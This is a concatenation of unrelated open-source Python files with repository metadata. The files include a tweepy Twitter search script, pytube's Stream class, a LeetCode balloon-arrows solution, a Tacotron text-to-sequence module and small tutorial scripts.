    def get_cover(self) -> str:
        return self._cover_from_content('.boxed > img.img-responsive')

    def book_meta(self) -> dict:
        # Metadata extraction is not implemented for this site.
        pass


main = MangAs
| [
"sttv-pc@mail.ru"
] | sttv-pc@mail.ru |
00d37ef5a44949f4d28a68655229c1733d6e2627 | da687718aa8ce62974090af63d25e057262e9dfe | /cap08-numeros/03_random.py | db2785183561b4bbf0cdc15b8b4c5a6a79ce731f | [] | no_license | frclasso/revisao_Python_modulo1 | 77928fa4409c97d49cc7deccdf291f44c337d290 | 1e83d0ef9657440db46a8e84b136ac5f9a7c556e | refs/heads/master | 2020-06-25T05:37:28.768343 | 2019-07-27T22:23:58 | 2019-07-27T22:23:58 | 199,217,969 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 589 | py | #!/usr/bin/env python3
# importando o modulo random
import random
# random numbers
print(random.random())  # float in the half-open interval [0.0, 1.0)

# Coin flip: randrange(2) yields 0 or 1.
decider = random.randrange(2)
print('HEADS' if decider == 0 else 'TAILS')
print(f'Decider is:', decider)

# One die roll (1..6).
roll = random.randrange(1, 7)
print("You rolled a " + str(roll))

# Draw 6 distinct numbers out of 0..60.
megaSena = random.sample(range(61), 6)
print(megaSena)

# random choices
possiblePets = ['cat', 'dog', 'fish']
print(random.choice(possiblePets))

cards = ['Jack', 'Queen', 'Ace', 'King']
random.shuffle(cards)
print(cards) | [
"frcalsso@yahoo.com.br"
] | frcalsso@yahoo.com.br |
02c87dfe25889db419238131737049196a75d3fd | f36999827ad651b5ff2fd4b20d7c0245d5f30cfe | /twi_search_sht_01.py | 7912ed0564577b9c68a69549a85199199c5ca20f | [] | no_license | axuaxu/twi-src | cbcfe6891539d568c9ecece0db531984d7552094 | 3347c7d4ebd94c3399a7427427745fa73fe8463e | refs/heads/master | 2021-07-11T09:07:58.013503 | 2017-10-15T17:15:10 | 2017-10-15T17:15:10 | 105,077,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,568 | py | import tweepy
from credentials import *
import sys
#import jsonpickle
import os
import codecs
import datetime
import json
# App-only (application) authentication: sufficient for search endpoints,
# no user access token needed.  (Python 2 file.)
auth = tweepy.AppAuthHandler(consumer_key, consumer_secret)
#auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True,
    wait_on_rate_limit_notify=True)
# NOTE(review): tweepy.API() returns a truthy object, so this guard only
# documents intent; a real auth failure would raise above instead.
if (not api):
    print ("Can't Authenticate")
    sys.exit(-1)
def TwiShort(out,shtFile):
    # Intended to copy per-tweet retweet counts from `out` into `shtFile`.
    # NOTE(review): iterating a text file yields plain strings, so
    # `twi._json` below raises AttributeError; a retweet count would also be
    # an int, which file.write() rejects.  The only call site below is
    # commented out, so this helper is effectively dead code.
    outF = open(out,'r')
    sFile = open(shtFile,'w')
    print shtFile
    for twi in outF:
        shtStr = twi._json.retweet_count
        print shtStr
        sFile.write(shtStr)
def TwiSearch(que,fName,sinceId,max_id):
    # Page backwards through Twitter search results for query `que`,
    # appending each tweet's raw JSON (as a Python repr string) to `fName`.
    # Returns a one-line summary suitable for the log file.
    searchQuery = que
    # this is what we're searching for
    maxTweets = 10000000 # Some arbitrary large number
    tweetsPerQry = 100  # this is the max the API permits
    # We'll store the tweets in a text file.
    # If results from a specific ID onwards are reqd, set since_id to that ID.
    # else default to no lower limit, go as far back as API allows
    # If results only below a specific ID are, set max_id to that ID.
    # else default to no upper limit, start from the most recent tweet matching the search query.
    tweetCount = 0
    print("Downloading max {0} tweets".format(maxTweets))
    with open(fName, 'w') as f:
        while tweetCount < maxTweets:
            try:
                # Four cases: with/without an upper bound (max_id) crossed
                # with with/without a lower bound (sinceId).
                if (max_id <= 0):
                    if (not sinceId):
                        new_tweets = api.search(q=searchQuery, count=tweetsPerQry)
                    else:
                        new_tweets = api.search(q=searchQuery, count=tweetsPerQry,
                                                since_id=sinceId)
                else:
                    if (not sinceId):
                        new_tweets = api.search(q=searchQuery, count=tweetsPerQry,
                                                max_id=str(max_id - 1))
                    else:
                        new_tweets = api.search(q=searchQuery, count=tweetsPerQry,
                                                max_id=str(max_id - 1),
                                                since_id=sinceId)
                if not new_tweets:
                    print("No more tweets found")
                    break
                for tweet in new_tweets:
                    # f.write(jsonpickle.encode(tweet._json, unpicklable=False) +
                    #         '\n')
                    f.write(str(tweet._json)+'\n')
                    print "\nid "+str(tweet._json['id'])
                    print "\nretwi "+str(tweet._json['retweet_count'])
                    # NOTE(review): _json is a dict, so attribute access will
                    # raise AttributeError -- presumably this was meant to be
                    # tweet._json['favorite_count']; `fav` is unused anyway.
                    fav = tweet._json.favorite_count
                tweetCount += len(new_tweets)
                print("\nDownloaded {0} tweets".format(tweetCount))
                # Page backwards: next request fetches tweets older than the
                # oldest one just received.
                max_id = new_tweets[-1].id
            except tweepy.TweepError as e:
                # Just exit if any error
                print("some error : " + str(e))
                break
    print ("Downloaded {0} tweets, Saved to {1}".format(tweetCount, fName))
    logStr = "Downloaded {0} tweets, Saved to {1}".format(tweetCount, fName)
    return logStr
#print "\nshortFile"+shtFile
#pass
#que = '#georgiaokeeffe'
#outName = 'tweets-01.txt'
# Default search window: no lower bound (sinceId) and no upper bound (max_id).
sinceId = None
max_id = -1L
#TwiSearch(que,outName,sinceId,max_id)
# Timestamp used in output/log filenames (':' and ' ' are not filename-safe).
now = datetime.datetime.now()
timestr = str(now).replace(' ','-').replace(':','-')
#print str(now)+'\n'+timestr+'\n'+timestr[:19]
twi = "twi_query_list.txt"
#fout = codecs.open(out,"w",encoding="utf-8")
ftwi = codecs.open(twi,'r',encoding="utf-8")
count = 100
# Windows-style relative output directories.
cdir = '.\\status-query'
srcDown = '.\\status-query-down'
logFile = cdir+'\\log-que-'+timestr[:16]+'.txt'
logStr = ""
#maxid = 9999999999999999999
shtFile=""
# Pass 1: run a search for every query in twi_query_list.txt and accumulate
# a log of what was downloaded where.
for que in ftwi:
    #maxid = getMaxID(que,cdir,srcDown,sinceId,max_id)
    #print "twi_id:"+twi_id+" maxid:"+str(maxid)
    out = cdir+'\\que-'+que+'-'+timestr[:16]+'.txt'
    out = out.replace('\r\n','')
    print "\ninput: "+ que+"\noutput: "+out
    logStr = logStr+"\ninput: "+ que+"\noutput: "+out
    logStr = logStr+TwiSearch(que,out,sinceId,max_id)
logF = open(logFile,'w')
logF.write(logStr)
# Pass 2: re-read the query list and derive "sht-que-" filenames; the
# TwiShort post-processing step itself is commented out.
twi = "twi_query_list.txt"
#fout = codecs.open(out,"w",encoding="utf-8")
ftwi = codecs.open(twi,'r',encoding="utf-8")
for que in ftwi:
    out = cdir+'\\que-'+que+'-'+timestr[:16]+'.txt'
    out = out.replace('\r\n','')
    shtFile = out.replace('que-','sht-que-')
    #tShort = TwiShort(out,shtFile)
    #fout = codecs.open(out,"w",encoding="utf-8")
    #fout.write(tstatus)
| [
"axu0110@gmail.com"
] | axu0110@gmail.com |
f5eb98bcd90970ce6adcab0d5a97253af6e5eec1 | afedbd0af6dff5a4fca8bab92e2a5574d9e541ca | /venv/lib/python3.5/site-packages/pytube/streams.py | bb3d1290a3817b2494579370fb2dd5a988b350ba | [] | no_license | wagolemusa/web_scrapping | d847b71ded82f471f28daed6083667eef450b21d | 794d24d1492d8ebeb9ffab16d1b185c6cab33c74 | refs/heads/master | 2022-12-31T22:31:02.407179 | 2020-10-21T09:27:39 | 2020-10-21T09:27:39 | 305,924,696 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,621 | py | # -*- coding: utf-8 -*-
"""
This module contains a container for stream manifest data.
A container object for the media stream (video only / audio only / video+audio
combined). This was referred to as ``Video`` in the legacy pytube version, but
has been renamed to accommodate DASH (which serves the audio and video
separately).
"""
from __future__ import absolute_import
import io
import logging
import os
import pprint
from pytube import extract
from pytube import request
from pytube.helpers import safe_filename
from pytube.itags import get_format_profile
logger = logging.getLogger(__name__)
class Stream(object):
    """Container for stream manifest data."""

    def __init__(self, stream, player_config_args, monostate):
        """Construct a :class:`Stream <Stream>`.

        :param dict stream:
            The unscrambled data extracted from YouTube.
        :param dict player_config_args:
            The data object containing video media data like title and
            keywords.
        :param dict monostate:
            Dictionary of data shared across all instances of
            :class:`Stream <Stream>`.
        """
        # A dictionary shared between all instances of :class:`Stream <Stream>`
        # (Borg pattern).
        self._monostate = monostate

        self.abr = None   # average bitrate (audio streams only)
        self.fps = None   # frames per second (video streams only)
        self.itag = None  # stream format id (youtube nomenclature)
        self.res = None   # resolution (e.g.: 480p, 720p, 1080p)
        self.url = None   # signed download url

        self._filesize = None  # filesize in bytes
        self.mime_type = None  # content identifier (e.g.: video/mp4)
        self.type = None       # the part of the mime before the slash
        self.subtype = None    # the part of the mime after the slash

        self.codecs = []         # audio/video encoders (e.g.: vp8, mp4a)
        self.audio_codec = None  # audio codec of the stream (e.g.: vorbis)
        self.video_codec = None  # video codec of the stream (e.g.: vp8)

        # Iterates over the key/values of stream and sets them as class
        # attributes. This is an anti-pattern and should be removed.
        self.set_attributes_from_dict(stream)

        # Additional information about the stream format, such as resolution,
        # frame rate, and whether the stream is live (HLS) or 3D.
        self.fmt_profile = get_format_profile(self.itag)

        # Same as above, except for the format profile attributes.
        self.set_attributes_from_dict(self.fmt_profile)

        # The player configuration which contains information like the video
        # title.
        # TODO(nficano): this should be moved to the monostate.
        self.player_config_args = player_config_args

        # 'video/webm; codecs="vp8, vorbis"' -> 'video/webm', ['vp8', 'vorbis']
        self.mime_type, self.codecs = extract.mime_type_codec(self.type)

        # 'video/webm' -> 'video', 'webm'
        self.type, self.subtype = self.mime_type.split("/")

        # ['vp8', 'vorbis'] -> video_codec: vp8, audio_codec: vorbis. DASH
        # streams return NoneType for audio/video depending.
        self.video_codec, self.audio_codec = self.parse_codecs()

    def set_attributes_from_dict(self, dct):
        """Set class attributes from dictionary items.

        :rtype: None
        """
        for key, val in dct.items():
            setattr(self, key, val)

    @property
    def is_adaptive(self):
        """Whether the stream is DASH.

        :rtype: bool
        """
        # if codecs has two elements (e.g.: ['vp8', 'vorbis']): 2 % 2 = 0
        # if codecs has one element (e.g.: ['vp8']) 1 % 2 = 1
        # BUGFIX: wrap in bool() so the property matches its documented type
        # (it previously returned the raw 0/1 remainder).
        return bool(len(self.codecs) % 2)

    @property
    def is_progressive(self):
        """Whether the stream is progressive.

        :rtype: bool
        """
        return not self.is_adaptive

    @property
    def includes_audio_track(self):
        """Whether the stream only contains audio.

        :rtype: bool
        """
        if self.is_progressive:
            return True
        return self.type == "audio"

    @property
    def includes_video_track(self):
        """Whether the stream only contains video.

        :rtype: bool
        """
        if self.is_progressive:
            return True
        return self.type == "video"

    def parse_codecs(self):
        """Get the video/audio codecs from list of codecs.

        Parse a variable length sized list of codecs and returns a
        constant two element tuple, with the video codec as the first element
        and audio as the second. Returns None if one is not available
        (adaptive only).

        :rtype: tuple
        :returns:
            A two element tuple with audio and video codecs.
        """
        video = None
        audio = None
        if not self.is_adaptive:
            video, audio = self.codecs
        elif self.includes_video_track:
            video = self.codecs[0]
        elif self.includes_audio_track:
            audio = self.codecs[0]
        return video, audio

    @property
    def filesize(self):
        """File size of the media stream in bytes.

        :rtype: int
        :returns:
            Filesize (in bytes) of the stream.
        """
        # Lazily fetched via a HEAD-style request the first time it is read.
        if self._filesize is None:
            headers = request.get(self.url, headers=True)
            self._filesize = int(headers["content-length"])
        return self._filesize

    @property
    def title(self):
        """Get title of video.

        :rtype: str
        :returns:
            Youtube video title
        """
        player_config_args = self.player_config_args or {}
        if "title" in player_config_args:
            return player_config_args["title"]
        details = self.player_config_args.get("player_response", {}).get(
            "videoDetails", {}
        )
        if "title" in details:
            return details["title"]
        return "Unknown YouTube Video Title"

    @property
    def default_filename(self):
        """Generate filename based on the video title.

        :rtype: str
        :returns:
            An os file system compatible filename.
        """
        filename = safe_filename(self.title)
        # BUGFIX: the template was missing the {filename} placeholder, so the
        # sanitized title was silently dropped from the result.
        return "{filename}.{s.subtype}".format(filename=filename, s=self)

    def download(self, output_path=None, filename=None, filename_prefix=None):
        """Write the media stream to disk.

        :param output_path:
            (optional) Output path for writing media file. If one is not
            specified, defaults to the current working directory.
        :type output_path: str or None
        :param filename:
            (optional) Output filename (stem only) for writing media file.
            If one is not specified, the default filename is used.
        :type filename: str or None
        :param filename_prefix:
            (optional) A string that will be prepended to the filename.
            For example a number in a playlist or the name of a series.
            If one is not specified, nothing will be prepended.
            This is separate from filename so you can use the default
            filename but still add a prefix.
        :type filename_prefix: str or None
        :rtype: str
        :returns:
            Path of the saved file.
        """
        output_path = output_path or os.getcwd()
        if filename:
            safe = safe_filename(filename)
            # BUGFIX: template previously lacked {filename}, discarding the
            # caller-supplied name.
            filename = "{filename}.{s.subtype}".format(filename=safe, s=self)
        filename = filename or self.default_filename
        if filename_prefix:
            # BUGFIX: same as above -- the prefix template dropped the
            # filename itself.
            filename = "{prefix}{filename}".format(
                prefix=safe_filename(filename_prefix), filename=filename,
            )

        # file path
        fp = os.path.join(output_path, filename)
        bytes_remaining = self.filesize
        logger.debug(
            "downloading (%s total bytes) file to %s", self.filesize, fp,
        )

        with open(fp, "wb") as fh:
            for chunk in request.get(self.url, streaming=True):
                # reduce the (bytes) remainder by the length of the chunk.
                bytes_remaining -= len(chunk)
                # send to the on_progress callback.
                self.on_progress(chunk, fh, bytes_remaining)
        self.on_complete(fh)
        return fp

    def stream_to_buffer(self):
        """Write the media stream to buffer.

        :rtype: io.BytesIO buffer
        """
        buffer = io.BytesIO()
        bytes_remaining = self.filesize
        logger.debug(
            "downloading (%s total bytes) file to BytesIO buffer",
            self.filesize,
        )

        for chunk in request.get(self.url, streaming=True):
            # reduce the (bytes) remainder by the length of the chunk.
            bytes_remaining -= len(chunk)
            # send to the on_progress callback.
            self.on_progress(chunk, buffer, bytes_remaining)
        self.on_complete(buffer)
        return buffer

    def on_progress(self, chunk, file_handler, bytes_remaining):
        """On progress callback function.

        This function writes the binary data to the file, then checks if an
        additional callback is defined in the monostate. This is exposed to
        allow things like displaying a progress bar.

        :param str chunk:
            Segment of media file binary data, not yet written to disk.
        :param file_handler:
            The file handle where the media is being written to.
        :type file_handler:
            :py:class:`io.BufferedWriter`
        :param int bytes_remaining:
            The delta between the total file size in bytes and amount already
            downloaded.

        :rtype: None
        """
        file_handler.write(chunk)
        logger.debug(
            "download progress\n%s",
            pprint.pformat(
                {
                    "chunk_size": len(chunk),
                    "bytes_remaining": bytes_remaining,
                },
                indent=2,
            ),
        )
        on_progress = self._monostate["on_progress"]
        if on_progress:
            logger.debug("calling on_progress callback %s", on_progress)
            on_progress(self, chunk, file_handler, bytes_remaining)

    def on_complete(self, file_handle):
        """On download complete handler function.

        :param file_handle:
            The file handle where the media is being written to.
        :type file_handle:
            :py:class:`io.BufferedWriter`

        :rtype: None
        """
        logger.debug("download finished")
        on_complete = self._monostate["on_complete"]
        if on_complete:
            logger.debug("calling on_complete callback %s", on_complete)
            on_complete(self, file_handle)

    def __repr__(self):
        """Printable object representation.

        :rtype: str
        :returns:
            A string representation of a :class:`Stream <Stream>` object.
        """
        parts = ['itag="{s.itag}"', 'mime_type="{s.mime_type}"']
        if self.includes_video_track:
            parts.extend(['res="{s.resolution}"', 'fps="{s.fps}fps"'])
            if not self.is_adaptive:
                parts.extend(
                    ['vcodec="{s.video_codec}"', 'acodec="{s.audio_codec}"']
                )
            else:
                parts.extend(['vcodec="{s.video_codec}"'])
        else:
            parts.extend(['abr="{s.abr}"', 'acodec="{s.audio_codec}"'])
        parts = " ".join(parts).format(s=self)
        return "<Stream: {parts}>".format(parts=parts)
| [
"homiemusa@gmail.com"
] | homiemusa@gmail.com |
e87e47c309e8b06fd93c6d7cc597f5ad45defb4c | a152297e3e61f99a6e48570f39a92f5bae44bfce | /read_csv_dtype.py | 533219d206b37a32af0682be7909bd61c27208a4 | [] | no_license | Syaza2007/pandas | 5ce73f2a15425619344ea7d6d69341bea4716fe3 | 3096bccbc58d4bb3cb1e5a62bb759aef55a97983 | refs/heads/master | 2020-06-09T02:58:15.913925 | 2017-09-12T17:08:34 | 2017-09-12T17:08:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 79 | py | df = pd.read_csv(inFile, dtype={'state':object,'county':object,'tract':object}) | [
"daniel.martin.sheehan@gmail.com"
] | daniel.martin.sheehan@gmail.com |
f7793911f3d5f2ab90020e6656f60bbb34963128 | 9f594f95fabf672df31c451ef758f1dd979d20e4 | /agsci/seo/__init__.py | 208daa14b09f51282fb42de2b027d9d6443ba431 | [] | no_license | tsimkins/agsci.seo | 0d37fea8f8a736a5109e050bbb82e90e4233a0a3 | 39b31b5df21961cbd278851dc3a53f71937fa84a | refs/heads/master | 2020-12-30T10:36:47.454391 | 2018-06-18T14:52:43 | 2018-06-18T14:52:43 | 26,601,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,160 | py | from Products.CMFCore.utils import getToolByName
from Products.PythonScripts.Utility import allow_module
from zope.i18nmessageid import MessageFactory
from DateTime import DateTime
# i18n message factory for the "agsci.seo" translation domain.
seoMessageFactory = MessageFactory('agsci.seo')
# Permit through-the-web Python Scripts to import this module.
allow_module('agsci.seo')
# Portal type names to exclude (directory, form, relation, and misc types).
# Not referenced in this module -- presumably consumed elsewhere in the
# package; verify before renaming or pruning.
exclude_types = [
    'Cardinality Constraint',
    'Content Reference',
    'FSDCommittee',
    'FSDCommitteeMembership',
    'FSDCommitteesFolder',
    'FSDCourse',
    'FSDDepartment',
    'FSDDepartmentalMembership',
    'FSDFacultyStaffDirectoryTool',
    'FSDPersonGrouping',
    'FSDSpecialtiesFolder',
    'FSDSpecialty',
    'FSDSpecialtyInformation',
    'FieldsetEnd',
    'FieldsetFolder',
    'FieldsetStart',
    'FormBooleanField',
    'FormConfirmationPage',
    'FormMailerAdapter',
    'FormMultiSelectionField',
    'FormRichLabelField',
    'FormSaveDataAdapter',
    'FormSelectionField',
    'FormStringField',
    'FormTextField',
    'FormThanksPage',
    'Interface Constraint',
    'Inverse Implicator',
    'Link',
    'Newsletter',
    'Relations Library',
    'Ruleset Collection',
    'Ruleset',
    'TalkEvent',
    'Type Constraint',
    ]
def initialize(context):
pass | [
"trs22@psu.edu"
] | trs22@psu.edu |
20e5c44e7c4bffe2d3c42c00cb01c58c6a6f4c9f | d886bbef4caafefc1796e77d41d7c7fdddbb4794 | /mb/__init__.py | 22b50fb108b7696e26f4c3bf7d0d376a66a26c1f | [] | no_license | coryshain/pyModelBlocks | 4864a23e4e8452340797fdbc60338ad5e579d14f | ba25bf5d5279962675763f3c30b6452dbae15d25 | refs/heads/master | 2020-08-26T21:30:55.126202 | 2019-11-11T21:12:38 | 2019-11-11T21:12:38 | 217,154,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | from mb.util.general import *
from mb.core.general.core import *
from mb.core.general.text import *
from mb.core.general.table import *
from mb.core.general.tree import *
from mb.core.parsing.core import *
from mb.core.regression import *
from mb.core.regression.lmer import *
from mb.core.regression.cdr import *
from mb.external_resources.ptb import *
from mb.external_resources.natstor import *
| [
"cory.shain@gmail.com"
] | cory.shain@gmail.com |
f9216e0b85abadad6d47ea519c87ced608c69d2a | 897802abf4ee5c7267de3eb5e321cc931898e2f6 | /python/python/songTian/part0_base/week02/c231_z_draw/__init__.py | 3186d069bc19e4cc6cb986cd688cddf78bfa3f9b | [] | no_license | aojie654/codes_store | 0527c7a7729b472e8fd2fd67af462cf857970633 | ed71b6266b2d2b5ddefadcb958f17695fb9db6cf | refs/heads/master | 2021-07-15T17:04:33.591673 | 2021-07-03T14:42:30 | 2021-07-03T14:42:30 | 132,343,733 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py | import turtle
# turtle.left(45)
# Draw a "Z"-like figure: move left without drawing, then draw the top bar,
# the diagonal, and the bottom bar; finally draw a circle near the top-right.
turtle.penup()
turtle.bk(200)
turtle.pendown()
turtle.fd(150)           # top horizontal stroke
turtle.right(135)
turtle.fd(300)           # diagonal stroke
turtle.left(135)
turtle.fd(150)           # bottom horizontal stroke
turtle.penup()
turtle.goto(100,150)
turtle.pendown()
turtle.circle(50,360)    # full circle, radius 50
| [
"aojie654@live.cn"
] | aojie654@live.cn |
f09ddbf128cad3f9efabae34ddc77bf3a77764f0 | 078918048099dfa2454cfac2d449ea3d77fbec55 | /452-minimum-number-of-arrows-to-burst-balloons.py | 370660e7078631a2893e6cedf203d00f19083f7a | [] | no_license | DmitryVlaznev/leetcode | 931784dcc4b465eebda7d22311f5bf5fa879f068 | b2a2afdfc725330545c9a2869fefc7d45ec594bc | refs/heads/master | 2023-06-10T05:42:34.992220 | 2023-06-05T09:54:10 | 2023-06-05T09:54:30 | 241,064,389 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,594 | py | # 452. Minimum Number of Arrows to Burst Balloons
# There are some spherical balloons spread in two-dimensional space. For
# each balloon, provided input is the start and end coordinates of the
# horizontal diameter. Since it's horizontal, y-coordinates don't
# matter, and hence the x-coordinates of start and end of the diameter
# suffice. The start is always smaller than the end.
# An arrow can be shot up exactly vertically from different points along
# the x-axis. A balloon with xstart and xend bursts by an arrow shot at
# x if xstart ≤ x ≤ xend. There is no limit to the number of arrows that
# can be shot. An arrow once shot keeps traveling up infinitely.
# Given an array points where points[i] = [xstart, xend], return the
# minimum number of arrows that must be shot to burst all balloons.
# Example 1:
# Input: points = [[10,16],[2,8],[1,6],[7,12]]
# Output: 2
# Explanation: One way is to shoot one arrow for example at x = 6 (bursting the balloons [2,8] and [1,6]) and another arrow at x = 11 (bursting the other two balloons).
# Example 2:
# Input: points = [[1,2],[3,4],[5,6],[7,8]]
# Output: 4
# Example 3:
# Input: points = [[1,2],[2,3],[3,4],[4,5]]
# Output: 2
# Example 4:
# Input: points = [[1,2]]
# Output: 1
# Example 5:
# Input: points = [[2,3],[2,3]]
# Output: 1
# Constraints:
# 0 <= points.length <= 104
# points.length == 2
# -231 <= xstart < xend <= 231 - 1
from typing import List
from utils import checkValue
class Solution:
    def findMinArrowShots(self, points: List[List[int]]) -> int:
        """Return the minimum number of vertical arrows needed to burst every
        balloon, where balloon i spans [points[i][0], points[i][1]] on the
        x-axis and an arrow at x bursts every balloon whose span contains x.

        Greedy sweep: sort by start coordinate and track the right edge of
        the running intersection of the current group; a new arrow is needed
        whenever the next balloon starts past that edge.

        BUGFIX: the previous version sorted the caller's list in place and
        rewrote the inner [start, end] pairs while sweeping, mutating the
        caller's data.  The secondary "larger end first" comparator it used
        was unnecessary for correctness, so a plain lexicographic sort on a
        copy suffices.
        """
        if len(points) < 2:
            return len(points)  # 0 balloons -> 0 arrows, 1 balloon -> 1 arrow
        ordered = sorted(points)
        arrows = 1
        reach = ordered[0][1]  # right edge of the current overlap window
        for start, end in ordered[1:]:
            if start <= reach:
                # Still overlapping: shrink the shared window.
                reach = min(reach, end)
            else:
                # Gap found: spend another arrow and start a new window.
                arrows += 1
                reach = end
        return arrows
# Smoke checks against the problem's published examples (checkValue is a
# project helper -- presumably checkValue(expected, actual); confirm).
t = Solution()
checkValue(2 , t.findMinArrowShots([[10,16],[2,8],[1,6],[7,12]]))
checkValue(4 , t.findMinArrowShots([[1,2],[3,4],[5,6],[7,8]]))
checkValue(2 , t.findMinArrowShots([[1,2],[2,3],[3,4],[4,5]]))
checkValue(1 , t.findMinArrowShots([[1,2]]))
checkValue(0 , t.findMinArrowShots([]))
checkValue(1 , t.findMinArrowShots([[2,3],[2,3]])) | [
"dmitry.vlaznev@datadvance.net"
] | dmitry.vlaznev@datadvance.net |
e85356b804f2734ce5dbfaf2d8f1d7ce277df17f | 78743e6b4f07a466d9b43e462f2d687443bf8538 | /phkit/english/__init__.py | 3ad48a32dab7797f62fdaa4cf8cbdc65b881d773 | [
"MIT"
] | permissive | tomguluson92/phkit | 9bac08019cc9f742ac82fa24a51e33448bb735da | ff6cd9114aa8a3737c05f0d4bba5d4da766770a0 | refs/heads/master | 2022-10-04T19:13:03.829071 | 2020-06-01T03:10:59 | 2020-06-01T03:10:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,789 | py | """
## english
from https://github.com/keithito/tacotron "
Cleaners are transformations that run over the input text at both training and eval time.
Cleaners can be selected by passing a comma-delimited list of cleaner names as the "cleaners"
hyperparameter. Some cleaners are English-specific. You'll typically want to use:
1. "english_cleaners" for English text
2. "transliteration_cleaners" for non-English text that can be transliterated to ASCII using
the Unidecode library (https://pypi.python.org/pypi/Unidecode)
3. "basic_cleaners" if you do not want to transliterate (in this case, you should also update
the symbols in symbols.py to match your data).
"""
import re
import random
from . import cleaners
from .symbols import symbols
# Mappings from symbol to numeric ID and vice versa:
_symbol_to_id = {s: i for i, s in enumerate(symbols)}
_id_to_symbol = {i: s for i, s in enumerate(symbols)}
# Regular expression matching text enclosed in curly braces:
# group(1) = text before the braces, group(2) = the brace contents
# (ARPAbet), group(3) = the rest of the string.
_curly_re = re.compile(r'(.*?)\{(.+?)\}(.*)')
def get_arpabet(word, dictionary):
    """Return the ARPAbet transcription of *word* wrapped in curly braces,
    or the word itself when the dictionary has no entry for it.

    *dictionary* must expose ``lookup(word)`` returning a list of
    transcriptions or None; only the first transcription is used.
    """
    entries = dictionary.lookup(word)
    if entries is None:
        return word
    return "{" + entries[0] + "}"
def text_to_sequence(text, cleaner_names, dictionary=None, p_arpabet=1.0):
    '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text.
    The text can optionally have ARPAbet sequences enclosed in curly braces embedded
    in it. For example, "Turn left on {HH AW1 S S T AH0 N} Street."
    Args:
      text: string to convert to a sequence
      cleaner_names: names of the cleaner functions to run the text through
      dictionary: arpabet class with arpabet dictionary
    Returns:
      List of integers corresponding to the symbols in the text
    '''
    sequence = []
    space = _symbols_to_sequence(' ')
    # Check for curly braces and treat their contents as ARPAbet:
    while len(text):
        m = _curly_re.match(text)
        if not m:
            # No (more) braces: clean the remaining text and encode it.
            clean_text = _clean_text(text, cleaner_names)
            if dictionary is not None:
                # Each word is transcribed to ARPAbet with probability
                # p_arpabet, so the output is nondeterministic unless
                # p_arpabet is 0.0 or 1.0 (or the RNG is seeded).
                clean_text = [get_arpabet(w, dictionary)
                              if random.random() < p_arpabet else w
                              for w in clean_text.split(" ")]
                for i in range(len(clean_text)):
                    t = clean_text[i]
                    if t.startswith("{"):
                        sequence += _arpabet_to_sequence(t[1:-1])
                    else:
                        sequence += _symbols_to_sequence(t)
                    sequence += space
            else:
                sequence += _symbols_to_sequence(clean_text)
            break
        # NOTE(review): this assignment is dead -- `clean_text` is unused on
        # the braced path; only m.group(1) below gets cleaned and encoded.
        clean_text = _clean_text(text, cleaner_names)
        sequence += _symbols_to_sequence(_clean_text(m.group(1), cleaner_names))
        sequence += _arpabet_to_sequence(m.group(2))
        text = m.group(3)
    # remove trailing space
    # NOTE(review): raises IndexError when `sequence` ends up empty (e.g.
    # empty input text) -- confirm callers never pass empty strings.
    sequence = sequence[:-1] if sequence[-1] == space[0] else sequence
    return sequence
def sequence_to_text(sequence):
    '''Converts a sequence of IDs back to a string'''
    pieces = []
    for symbol_id in sequence:
        if symbol_id not in _id_to_symbol:
            # Unknown IDs are silently skipped.
            continue
        symbol = _id_to_symbol[symbol_id]
        # ARPAbet symbols are stored with a leading '@'; re-wrap them in
        # curly braces for display.
        if len(symbol) > 1 and symbol[0] == '@':
            symbol = '{%s}' % symbol[1:]
        pieces.append(symbol)
    return ''.join(pieces).replace('}{', ' ')
def _clean_text(text, cleaner_names):
    """Run *text* through each named cleaner from the ``cleaners`` module,
    in order, and return the cleaned text.

    Raises:
        Exception: if a name in *cleaner_names* is not a known cleaner.
    """
    for name in cleaner_names:
        # BUGFIX: getattr() without a default raised AttributeError for an
        # unknown name, making the explicit error below unreachable.
        cleaner = getattr(cleaners, name, None)
        if cleaner is None:
            raise Exception('Unknown cleaner: %s' % name)
        text = cleaner(text)
    return text
def _symbols_to_sequence(symbols):
    """Translate an iterable of symbols into their numeric IDs, dropping any
    symbol that should not be kept.  (The parameter shadows the module-level
    ``symbols`` import; kept for call-site compatibility.)"""
    return [_symbol_to_id[sym] for sym in symbols if _should_keep_symbol(sym)]
def _arpabet_to_sequence(text):
    """Prefix each whitespace-separated ARPAbet token with '@' and encode."""
    return _symbols_to_sequence('@' + token for token in text.split())
def _should_keep_symbol(s):
    '''Return True if *s* maps to a symbol ID and is not the padding ('_') or EOS ('~') marker.

    Bug fix: the original used ``s is not '_'`` / ``s is not '~'``, which
    tests object identity rather than string equality. That only worked by
    accident of CPython interning single-character literals and emits a
    SyntaxWarning on Python 3.8+. ``not in`` performs the intended value
    comparison.
    '''
    return s in _symbol_to_id and s not in ('_', '~')
| [
"kqhyj@163.com"
] | kqhyj@163.com |
283beabf89838afcd66883c346c7a93bfba3840a | 89cd8b77ad5171c336cc60b2133fe6468a6cb53f | /Module01_CZ/day6_data_structure/04-代码/day6/102_元组.py | 2a44d5053791d093d0eafa1f4fa309c5bf6d9cd2 | [
"MIT"
] | permissive | fenglihanxiao/Python | 75178f6b6b0c53345e1ed54226ea645216572d6c | 872baf3a3a5ee42740161152605ca2b1ddf4cd30 | refs/heads/master | 2021-05-23T18:49:20.656433 | 2020-04-29T01:06:21 | 2020-04-29T01:06:21 | 253,199,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | """
演示元组
"""
# Tuple demo: tuples are immutable, heterogeneous sequences.
tuple1 = (1, 2, 3, "itcast", "黑马程序员", True, False)
print(tuple1)
# A one-element tuple requires the trailing comma.
tuple2 = (100,)
print(tuple2)
# tuple3 = ("itcast")  # not a tuple -- parentheses alone don't make one
# print(type(tuple3))
# print(tuple1[4])
